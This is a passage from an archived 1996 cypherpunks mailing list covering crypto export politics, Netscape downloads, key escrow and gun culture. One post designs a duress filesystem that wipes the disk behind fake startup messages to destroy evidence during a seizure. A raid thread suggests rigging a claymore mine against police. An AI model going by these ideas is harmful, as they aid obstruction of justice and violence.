>(arguably) a copy of the original.  It is also useful when the actual
>workings of the original, or the way the original is made, is a (trade)
>secret.

Important comment.

Further, as I understand it if an implementation is obvious to one
practiced in the art, one's ability to protect such an implementation is
also limited.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 20 Jul 1996 19:37:25 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <199607200930.LAA08360@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves wrote:
>[on hacktic]
>> netscape-fts2-hp10.tar.gz	Fast Track Server 2.0 for HPUX10
>> netscape-fts2-nt.exe		Fast Track Server 2.0 for WinNT
>> netscape-hpus-30b5.tar.gz	Navigator 3.0b5 for HP-UX
>> netscape-linux-30b5.tar.gz	Navigator 3.0b5 for Linux
>> netscape-ssl30-src.tar.gz	SSL 3.0 source code
>> netscape32us-30b5.exe	Navigator 3.0b5 for Win95/NT
>
>And thus it begins... I think it's a bad idea to provoke the TLAs
>like this, but I suppose it's inevitable.

Why is it a bad idea? If you don't do it, you support the ITAR
by your lack of action! Every day that you don't export strong
crypto you assist the enemy.

>(But doesn't anyone use Macs or Suns?)

Mac download didn't work yesterday. The download page doesn't
say if the Solaris versions are for Sparc or Intel (they are
different and incompatible binaries, aren't they?).

>> By the way, is it possible to get a certificate for the
>> Fast Track 128 bit servers outside of north america?
>
>Why would you want one when the source for Apache-SSL is available?

Just for fun. To show the TLAs what complete morons they are...

>Besides, it's a Serious Copyright Violation, said with minimal
irony. This whole thing isn't Netscape's fault; in fact, they're
>doing their best to be the good guys. 

Do you Seriously Believe that Netscape would prefer foreigners
to develop and use competing products? Of course not. They are
probably secretly applauding the brave exporters.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jul 1996 04:49:22 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
Message-ID: <199607201837.LAA22002@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:59 AM 7/19/96 -0700, Tom Paquin wrote:
s far as company policy goes, it's a good bet that we won't
>willingly break any laws.  Licensing export-restricted software
>to a "foreign person" (includes companies, etc) without a
>particular export license would probably be a mistake which would
>get corrected quickly.

I don't think there is any contradiction here.  ITAR arguably prohibits 
disclosure; it does not prohibit licensing WITHOUT explicit disclosure.  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jul 1996 04:54:56 +0800
To: thorel@netpress.fr
Subject: Re: lambda 2.09 - French Telco Act Censored?
Message-ID: <199607201837.LAA22011@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:41 PM 7/19/96 +0100, Jerome Thorel wrote:

>OECD FAILS TO ACT ON KEY-ESCROW ENCRYPTION; THE US ACCUSED OF "POLICY
>LAUNDERING"
>
>The Paris-based OECD, the 24-members club of industrialised nations, has
>failed to take a step towards international recongnition of key-escrow
>encryption. The meeting of June 26-28 in Paris, scheduled to take a firm
>decision about the possibility of law enforcement agencies to read
>electronic mail of private individuals and corporations, didn't succeed to
>act on a compromise. The OECD's general secretary has no special power to
>draw regulations and must find a common policy on the matter.
[deleted]
>
>Sources said the US were willing to "use" the OECD as a "policy laundering"
>machine : to pressure the organisation in order to have the key escrow
>policy approved by the 24 countries. US intelligence officials would have
>been using it as a political weapon at home, where Congress,
>public-interests groups and industry pressure groups are on the verge to
>act against any key-escrow policy.



Lemme see...  The Europeans are now complaining about the US government 
pushing key escrow on them?  So where did that "emerging consensus" go?!?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 21 Jul 1996 05:02:57 +0800
To: Brad Dolan <hua@xenon.chromatic.com>
Subject: Re: [Noise] was Re: Giving 6 year old kids Uzi's
Message-ID: <2.2.32.19960720183717.00b2478c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:31 AM 7/20/96 -0400, Brad Dolan wrote:

>> Would you just hand out guns to all teenagers?
>
>My twelve-year-old daughter asked for and received a .22 for her birthday.
>Her four and six year old siblings enjoy shooting it, under close 
>supervision.

I learned how to shoot very young.  My father taught me, as well as
enrolling me in NRA competitions around age 14.  They still have high school
rifle teams where I used to live as well.  But then the culture is quite
different towards guns in Alaska than it is here...  (For one, people do not
view them as toys and/or possessed by evil spirits or the like...)

>Rural America has a very different culture than urban America and urban 
>America's recent attempts to impose its values (like hoplophobia) on us 
>really chafes.

I bet the "National Curfew" crap that Clinton is trying to push is not going
down well either.  He seems to think that the problems of a small fraction
of the country apply to the whole country...  (But it makes for good sound
bites.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 21 Jul 1996 04:56:54 +0800
To: ecgwulf@worldnet.att.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960720183720.00de3c00@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:38 AM 7/20/96 -0400, Perry E. Metzger wrote:
>
>Llywarch Hen writes:
>> You have not had the opportunity to look closely at the business end
>> of a gun.  The hole looks enormous.
>
>The opening in the barrel of just about every rifle or pistol I've
>looked at seems to be about half an inch or less. Perhaps you have
>been looking at the 18" guns on the battleship "New Jersey"?

There is a time and space dilation when the gun is pointed directly at you
and about to be fired.  (Been there, done that...)  Perception tends to be
skewed when all of the adrenaline is pumping into your bloodstream because
of a perceived impending death.

Believe me, it does look big.  A 12 gauge especially...  (Had a brother who
came close to shooting me because he thought I was a burglar.  Not fun.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 21 Jul 1996 04:55:01 +0800
To: Vinnie Moscaritolo <cypherpunks@toad.com
Subject: [NOISE} Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960720183725.00e38e60@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:10 AM 7/20/96 -0800, Vinnie Moscaritolo wrote:

>Speaking of Bob Hettinga put it to words best, told me that standing on the
>Concord bridge he could see the colors of the American flag eminating
>outwards to the rest of the country. Yup this is where it all started..

Should teach him not to drink so much in the combat zone in Boston. ]:>

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 21 Jul 1996 04:57:04 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: ABC News on internet telephony
Message-ID: <199607201846.LAA22368@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 AM 7/19/96 -0500, snow wrote:

>     It is my understanding that billing is one of the biggest headaches
>and expenses for a phone company. Going to a flat rate would solve a 
>decent amount of that wouldn't it?

I've heard it claimed that billing and customer service is half of their 
costs, at least.  If that's the case, then "flat rate" billing can't be far 
behind.   Prodded by "free" Internet phone, they can't avoid it for much 
longer.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Sun, 21 Jul 1996 04:56:51 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
In-Reply-To: <199607191718.NAA04087@unix.asb.com>
Message-ID: <199607201848.LAA07682@dfw-ix10.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an idea for implementing DuressSFS and/or NukeTheData functions on 
demand with plausible deniability for all (without all your keys, TLA's wouldn't 
know how many encrypted partitions you had:

1. Doing anything with the encrypted file system requires 2 keys.

2. The first key decrypts the FAT (the FAT info is always written to the disk 
encrypted) and an encrypted control sector, which is cylinder 0, head 0, sector 
JustAfterTheMBRAndPartionTable.  This control sector is divided into 16 32-byte 
(256-bit) fields or records.

3. If a hash of the key entered matches the undecrypted contents of record 0, 
(bytes 0-31) the EFS enters an infinite whole-drive encryption loop, using a 
hash of the key provided and any handy entropy, to produce a new key.  The EFS 
will produce new keys as frequently as possible by hashing any entropy it can 
gather while nuking the data on the drive. While this is happening, dummy 
messages should be displayed, such as "Starting Windows 95...", "An exception 
has ocurred at XXXX:XXXXXXXX  Press any key to continue." (when the entropy 
stock needs replenishment) or any other reasonably common startup messages. 
(NukeTheData) (TM)

4. If the first key is not the NukeTheData key, the EFS prompts for a second 
key.

5. After receiving the second key, the EFS hashes it and compares the hash to 
the data in the control sector records, and mounts any encrypted logical 
drive(s) with matching key hashes.

6. If an incorrect second key is entered X times(X between 3 and 20), 
(NukeTheData = True) is assumed, and executed.

Using this system, without the first key, it should be impossible to tell how 
many separate encrypted logical drives there are on the disk. Without the second 
key(s) the data in the ELD's should be worthless.  On bootup, the pass phrase 
entry screen should be designed to look exactly like the CMOS bootup password 
screen, and no messages indicating the existence of EFS should be displayed 
until after a correct 2nd key has been entered.  Why advertise your security 
measures?  Unless "they" have been tipped off to the fact that you use EFS, they 
can easily destroy all of the data through ignorance, especially if you have a 
PostIt note with the NukeTheData password/phrase (which wouldn't have to be 
"good"--you could use "GovtStupid" or something similar) stuck to the side of 
your monitor, and keep your mouth shut during interrogation.
Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 21 Jul 1996 05:22:57 +0800
To: Jerome Tan <cypherpunks@toad.com>
Subject: [NOISE] Re: Firewall Penetration
Message-ID: <2.2.32.19960720190133.00af90a4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:29 PM 7/19/96 +0800, Jerome Tan wrote:
>Is it possible to penetrate a firewall?

Yes, but it requires alot of time and money.  (As well as a nice car and a
six figure income.)  

I recommend taking the firewall out to a nice restaurant, feeding it dinner,
taking it out for drinks and then back to your house or apartment.

If everything works, you should be able to penetrate said firewall.

But she will not return your calls in the morning...

---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 21 Jul 1996 05:46:48 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape download requirements
In-Reply-To: <v03007612ae16d2f7d9d6@[192.187.162.15]>
Message-ID: <Pine.SUN.3.91.960720120255.10561A-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sat, 20 Jul 1996, David Sternlight wrote:

> Glad to explain it. I used "tell" in the sense of compel, not
> in the sense of expressing one's opinion. "Joe told us what to
> do" is different from "Joe expressed his opinion of what we
> should do" in the sense I used it.

Really?  But you wrote:

>> nor do YOU get to tell them that they are poor benighted fools
>> who should agree with YOUR views on civil liberties. To assert
>> otherwise is fascism, authoritarianism, dictatorship, pick one.

Oh, I see, "tell," "should" and "assert" REALLY mean compel.  And
what, exactly, would I, the "teller" be compelling them to do?  I 
now understand how you are able to win so many debates.  I guess
I'd just better give up and take THE PLEDGE, you're just too sly
for me.

Sorry Perry, you were right.


 S a n d y

P.S.	For those of you who choose to suffer Sternlight,
	I leave you with this little quote from Lewis Caroll.
	You might find it useful to cite when jousting with
	our sophistic friend:

		   "When /I/ use a word," Humpty Dumpty
		said, in rather a scornful tone, "it
		means just what I choose it to mean--
		neither more nor less."
		   "The question is," said Alice, 
		whether you /can/ make words mean so
		many different things."
		   "The question is," said Humpty Dumpty,
		"which is to be master--that's all."

And now back to David Sternlight for what he really wants, the
Last Word.  :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Seanor <cibir@netcom.com>
Date: Sun, 21 Jul 1996 06:35:08 +0800
To: Jerome Tan <jti@i-manila.com.ph>
Subject: Re: Reverse Engineer
In-Reply-To: <01BB752B.7DCF4600@ip65.i-manila.com.ph>
Message-ID: <Pine.3.89.9607201236.A5967-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 17 Jul 1996, Jerome Tan wrote:

> What do you mean by "reverse engineer?" I have heard this word several times especially in 
the world of hacking, but... can someone tell me what it really meant?
> 

Speaking of reverse engineering something, what is a program that will 
allow you de-compile a visual basic app?

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Seanor <cibir@netcom.com>
Date: Sun, 21 Jul 1996 06:36:54 +0800
To: Erle Greer <erleg@sdinter.net>
Subject: Re: Viacrypt PGP version 4.0
In-Reply-To: <2.2.32.19960720021701.006b1570@pop3.sdinter.net>
Message-ID: <Pine.3.89.9607201256.A5967-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jul 1996, Erle Greer wrote:

> Is there a free/trial/steal/shareware version of Viacrypt PGP Personal
> version 4.0, rather than forking over $129.00?
> 

My company sells it for $100, if you want the full version with the book 
and everything.

Joseph Seanor





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Sun, 21 Jul 1996 06:27:17 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007605ae1623952449@[192.187.162.15]>
Message-ID: <199607202002.NAA17000@dfw-ix1.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 19 Jul 1996, ichudov@algebra.com (Igor Chudov @ home) wrote:
>I suggest wiring an anti-tank mine to your door every night. If 
>ninjas break in, everyone goes to hell. No need to wake up and be
>alert in sleep -- all will be done automatically. So before that
>ninja raid you will sleep better.

A claymore mine would be much better.  It would send the "ninjas" to hell, 
without necessarily forcing you to join them.

On Fri, 19 Jul 1996, David Sternlight <david@sternlight.com> wrote:
[Snip]
>Probably something to do with flushing dope down the toilet, or destroying
>evidence. Perhaps it's too much to expect them to disconnect the sewer line
>and hit your interior with a water hose and an electricity cut-off before
>raiding it.

If tests are available that can detect trace amounts of drugs in your urine 30 
days after snorting cocaine, they ought to be able to detect traces of drugs in 
the toilet bowl/sewer pipe 5 minutes after you flush...

The whole "war on drugs" has been an excuse for abrogating our Constitutional 
rights.  Much of the impetus for banning "assault weapons" and "Saturday night 
specials" is a by-product of media hype of crimes committed by drug dealers and 
gangs.  Drug crime has been used as an excuse to involve the military in law 
enforcement, (That's how the FBI got the tanks involved at Waco!) and it has 
been the primary factor in the incrased popularity of SWAT raids.
Jonathan Wienke

"1935 will go down in history! For the first time a civilized nation has full 
gun registration! Our streets will be safer, our police more efficient, and the 
world will follow our lead in the future!"
--Adolf Hitler

"46.  The U.S. government declares a ban on the possession, sale, 
transportation, and transfer of all non-sporting firearms. ...Consider the 
following statement:  I would fire upon U.S. citizens who refuse or resist 
confiscation of firearms banned by the U.S. government."
--The 29 Palms Combat Arms Survey  
http://www.ksfo560.com/Personalities/Palms.htm

1935 Germany = 1996 U.S.?

Key fingerprint =  30 F9 85 7F D2 75 4B C6  BC 79 87 3D 99 21 50 CB

P.S. Chesnokov = Chudov = Vulis = Sternlight = Detweiler





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 21 Jul 1996 03:54:32 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: take the pledge
In-Reply-To: <Pine.SV4.3.91.960719222636.17923E-100000@larry.infi.net>
Message-ID: <v0300762fae16be46b925@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Look, folks, we all know that 99% of what David Sternlight posts is
> garbage. Why don't we all pledge not to answer any of his posts, and
> then he'll go away.

The more I see, the more I agree. I filter relevant stuff out of here onto
e$pam, and I've only sent out about two of Mr. Sternlight's "n-ty" total
posts in the past four days or so. He certainly is articulate and well
read, but he's considerably mired in heirarchical statist thinking. It's a
wonder he doesn't trip, walking with his head turned exactly backward like
that...

Our political differences aside, and in the spirit of keeping my killfile
from frying under the load of plonking him, ;-), I would like to propose
what could be called a compromise.

I challenge Mr. Sternlight to do two things:

1. Not to respond to this post. :-).

Actually, I believe that's part of my problem with Mr. Sternlight. He's
about the best tat-titter I've ever seen. On my high-school forensics team,
he would bat .500 in all his matches, because he would win all his negative
debates and have no affirmative case for the rest. Or, more to the point,
he might have one, but he never seems to present it except in rebuttal.
Unfortunately, the judges don't count those points, David, and even though
this is just a mail list, the same rules of logic and rhetoric are there,
whether we like them or not.  Which brings me to the second challenge,

2. Write something from scratch.

That is, actually *start* a thread. From scratch. Probably one of the
causes of a lot of the vitriol on this list is instant "Oh, yeah, sez who!"
ability that e-mail gives us. I would be very interested in something from
Mr. Sternlight where he gave us some facts, some deduction from those
facts, and some well-thought-out conclusions from those deductions. It
would probably be a treat to read, and, when done, would not be nearly as
objectionable as his frequent and voluminous pot-shots from behind the
hedgerows. Witty repartee is nice, occasionally, but, like rich food, it
can make one bloated and bilious when consumed in any quantity.


On a small tangent, my idea of a perpetual motion machine would be a
Sternlight/Hallam-Baker flamewar, those two seeming to be the greatest
tat-titters on this list (exclusive of those in my kill-file, who, of
necessity, will remain nameless here). Of course, this would be a paradox,
because even though Mr. (yes, *Mr.*, in the Oxfordian sense, Phill) H-B is
a thoroughgoing liberal crypto-socialist (in the "Myra Brekenridge" sense
of crypto) and Mr. Sternlight is an equal and opposite conservative, they
both end up holding the same end of the stick in arguments around here. I
find that quite interesting to think about from the standpoint of political
philosophy, but it doesn't make them any less annoying to read. For the
moment, anyway.

Cheers,
Bob Hettinga



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfEYH/gyLN8bw6ZVAQFFAgP7BvdsuU0NG0x70z1/jBkSLQeRC9Cbk4NQ
HoRYWvMRvpRazkDnWRwQvtgnEGWHCZ5jCHTPXu5R68QaHLUHYXGjoUlqtUZYVfTF
R6ZCaZ/Lsvoh0zlr5dOACbfKGKm2+ZTHd8YuOdpBZQTcSzAzVv6lRJ0xMOmkJjXB
BxabINghUoc=
=3rDH
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Sun, 21 Jul 1996 07:32:21 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <31F01F8B.794B@ai.mit.edu>
Message-ID: <Pine.3.89.9607201302.A9726-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 19 Jul 1996, Hallam-Baker wrote:

> Jonathon Blake wrote:
> 
> > On Fri, 19 Jul 1996, Hallam-Baker wrote:
> > 
> > > dangerous people arround besides the government and the government is the
> 
> >         The _only_ difference between a gang of thugs, and a government,
> >         is that the latter admit to being thugs, whilst the former deny
> >         that.  They both operate on the same prinicple -- steal from
> >         others, and kill those that oppose them.
> 
> The people of the USA fortunately disagree. Its no coincidence that Limbaugh
> has been unable to continue his tv show after his coverage of the OKC bombing.
> 

NIce try at a segway, but this reasoning is nothing more than bullshit.

I get so tired of hearing the same press/DNC derived crap after 3 days...

Limbaugh is giving up the show because it is run in syndication. 
Syndication is not a profitable format with the ensuing satellite blitz 
on the horizon. 

Limbaugh is a buisnessman and a commentator. He earns a living. He will 
do what is necessary to leverage his marketability to make the most money.

Since you've gone to college, I'll have to explain it to you: It's called 
capitalism - look into it...

> It is not socialy acceptable to call for the murder of Police officers in most
> countries. By doing so you are discrediting yourself and those who support you.
> 
> 

So tell that to G. Gordon Liddy...

You fail to acknowledge the simple fact that a segment of society that 
feels not only disenfranchised, but that the system is irrepairable will 
stoop to whatever means they feel is necessary to make their point. They 
don't care what other people think - just what they believe in. 
Discrediting is a non issue.

> 
> > > only agency that is going to protect society from them. If you don't like
> > 
> >         Governments are the agencies _most_ likely to abuse one's
> >         freedom.   << Take Northern Ireland, as an example of what
> >         happens, when a government tries to pacify a region, by
> >         prohibiting everything.  >>
> 
> Troops were sent into Northern Ireland originally to protect the Catholic 
> minority from the protestants. The two communities have been murdering each
> other for centuries and there are bigots on both sides who think that the
> events of three hundred years ago "prove" that the other is evil incarnate.
> 
> Do you support the "punishment beatings" performed by the IRA. So far this
> year they have committed grievous bodliy harm against 270 people. They have
> also murdered 4 people. There have been no deaths from police or army use
> of firearms in that period. Your assertion is therefore false.
> 
> If you want to discuss the politics of Ireland you should at least visit the
> place. You will find remarkably less sympathy for your romantic visions of
> bloodshed amongst the people who have to live with the consequences. The
> British people have little sympathy for either side and would quite happily
> leave the two sides to slaughter each other if it wasnt for the fact that
> the majority of the population wish to remain British and have voted to
> remain so in regular referenda and national elections.
> 
> 
> 		Phill
> 

Welcome to Yugoslavia. The last riots on the tele over there didn't look 
any different than pictures the BBC showed of Serajevo during the early 
days of the country's demise. 

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 21 Jul 1996 06:21:47 +0800
To: paquin@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EFCCCC.B13@netscape.com>
Message-ID: <199607201935.OAA17617@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Don't screw with the system, and I can bet how the policy
review will come out.

	We just had a policy review; the National Academy of Sciences
had a very prestigious group do a review of our Cryptographic Policy.
It suggested liberalization.

	Clearly, someone didn't like that, so the Powers That Be are
doing another policy review in the hopes of getting a review that they
like.  If they don't get something they like, there will be another
policy review, chaired by Loius Freeh, and taking testimony from such
prestigious cryptographers as Dr. Denning.

Adam


Tom Paquin wrote:

| > Exporting crypto-systems and killing people is comparing apples
| > and hand grenades.  Please come up with a relevant analogy.
| 
| You missed the point.  Right now the government is in the midst
| of a policy review.  Your inclination to view that policy as
| irrlevant simply doesn't matter.  Proving to them that a more
| tolerant policy would not be in their interest is not in our
| interest.
| 
| Screw with this system and I can bet how the policy review
| will come out.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sun, 21 Jul 1996 07:58:58 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Netscape download requirements
Message-ID: <2.2.32.19960720213701.006a4fc8@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>If they disagree with what Congress and the administration have done, there
>are well-established ways to petition Congress to change it. If they fail,
>t.s.--that's the way our system works. YOU don't get to force your will on
>the wider population, nor do YOU get to tell them that they are poor
>benighted fools who should agree with YOUR views on civil liberties. To
>assert otherwise is fascism, authoritarianism, dictatorship, pick one.

I don't think that demanding more liberty can in any way fall into any
of those three categories.  What happened to protecting a minorities Rights
from the Majority?  Simply because a majority decided they should take away
my Rights (in this case to encryption, and for the sake of argument, I will
concede for the moment that a majority actually did decide this) doesn't mean 
they should be taken away.  This is what the Constitution and other founding 
documents are designed to protect us against.  Saying "I have the Right to give 
encryption to anyone I want" is not forcing my will on the wider population,
it is an attempt to keep the wider population from forcing their 
un-Constitutional will on me.  //cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sun, 21 Jul 1996 08:20:04 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <4srk6q$2fd@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <31EF632D.2B88@netscape.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>Roy M. Silvernail wrote:
>> Anyone sniffing the link
>> knows the filename from previous forms submissions, anyway.
>
>  You can't sniff the link, since the form submission and the
>file download are via SSL.
>
But assumedly if they're downloading the 128-bit netscape, then they're
only using the 40-bit version to do it... :-)

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfFUFkZRiTErSPb1AQGp+gQAsZAqh46sZSZGqEHXP54CyMvyEwTtYW1S
cbaEiY4YH8lae7QoJ17nL1CX1YpqbCWLvw6z6ghDHZTuU8jwJIMxT9u+OliJFVRc
+bQ9pDULtXX4frdP/xTVWM9WIGLeK6ylv89YxBhWALPaZl5q6qYfjtlK6JXl9LG7
CIWLzA9UO6M=
=TFS4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sun, 21 Jul 1996 08:14:29 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
In-Reply-To: <199607172125.RAA09158@unix.asb.com>
Message-ID: <4srkst$2q0@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199607182148.WAA00324@server.test.net>,
Adam Back  <aba@dcs.ex.ac.uk> wrote:
>ie. the attacker can not tell without the hidden file system key (if
>one exists) whether the unused space on your drive is really just
>that: unused space filled with garbage, or whether it is in fact
>another encrytped filesystem.
>
>They might be suspicious, but I don't think they would be able to
>claim you were in comptempt of court, if you provide the 1st key and
>claim there is no other key: the software has support for either 1 or
>2 filesystems.
>
The fixes to the encrypted loopback filesystem support for Linux that
I'll be finishing shortly (hopehopehope) incorporate, among other things,
the following features:

o encrypted filesystems
o stego'ing a filesystem in a large (say audio) file

Now, what if you do this:

Record 1/2 an hour of music from your CD, say at 8k samples/sec, 8 bits/sample,
stereo.  In the _left_ channel, stego your real filesystem.  In the _right_
channel, stego your duress filesystem.  If the cops are suspicious that
you have a huge sound file on your hard drive and they don't believe that
it's just for audio purposes, you could (reluctantly) give up the duress key.

Does this have the properties you want?

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfFW2kZRiTErSPb1AQFaEAP+IRZmsZCEsY4IiKU/TW5qta+2Aljly/3X
wlW3Rp90idwh58erjY4Lnikk9fvvm0J2gb59eKObSTmAW5JzIwJpfrL00ZMJzCog
LsGL+h0HvV4VKUAYomvIZ3MoKXad6tAfIEPuiOYhQvX56my/oLElyKBaUUgKeqOZ
MwdM7pPLhbg=
=Hesa
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Sun, 21 Jul 1996 08:14:25 +0800
To: cypherpunks@toad.com
Subject: Re: Opiated file systems
In-Reply-To: <ae13d749190210044435@[205.199.118.202]>
Message-ID: <4srl21$2rr@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199607182213.RAA10532@pentagon.io.com>,
Douglas R. Floyd <dfloyd@IO.COM> wrote:
>If someone has any ideas on how to slow down attacks like this, please
>E-mail me.  It would be nice to have an offsite storage place, but without
>the necessity of giving a bunch of personal info (as with Mcaffee's
>WebStor).

Charge ecash?

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfFXfkZRiTErSPb1AQF9YAQAk/mY+nAp9iGeGwZh+lC7Q0RPK+xjFs6d
dT+mu/WiS9UP13IJLe+Rs2i3AFRry/lD4XPdL/CDTgDC5nH+Yalb8MSVJr9WJTvM
iiZk6twYNXygTK0kF+u3g5QCCofSQoJXTDp0gL1Qkd+gw2kFzYo5xkK6TsPtbZWh
Ld08fPu15Gc=
=QHCI
